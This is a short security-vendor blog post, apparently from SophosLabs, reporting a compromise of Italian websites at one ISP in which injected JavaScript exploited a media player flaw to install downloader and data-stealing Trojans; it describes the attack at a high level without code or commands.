Another major site compromise (part II)

In the previous part of this post I highlighted the compromising of a large Italian web site. Pages were modified (addition of a malicious Javascript) in order to silently load malicious content from a remote server. This in turn was another malicious Javascript exploiting a media player plugin vulnerability (MS06-006) in order to download a malicious Win32 downloader Trojan (detection for this is being published as Mal/DownLdr-H).

The downloader itself downloads a configuration file from another remote server, which contains further URLs to download from. The ultimate payload is a Win32 data stealing Trojan pro-actively detected as Mal/Basine-C.


The good news is that following the swift reaction of folks at our Italian office, the first compromised site has been cleaned up (kudos to the affected company for acting so quickly). Unfortunately, since then SophosLabs have seen other Italian sites that have fallen victim to the attack. Digging into the list of sites it is apparent that all lie in a close IP range. In fact, all are hosted by the same ISP. So in this case, it is likely that the attackers managed to gain remote access to the web server(s) at this ISP, and compromised the sites hosted there. In this attack, the web server in question is running Microsoft-IIS/6.0 on Windows Server 2003.

This scenario illustrates perfectly the consequences of just a single web server being compromised by intruders. That server could be hosting many different web sites, and a failure in the security of that machine could have significant consequences:

  • expose potentially huge numbers of people to malicious threats
  • damage the reputation of the companies/individuals hosting sites there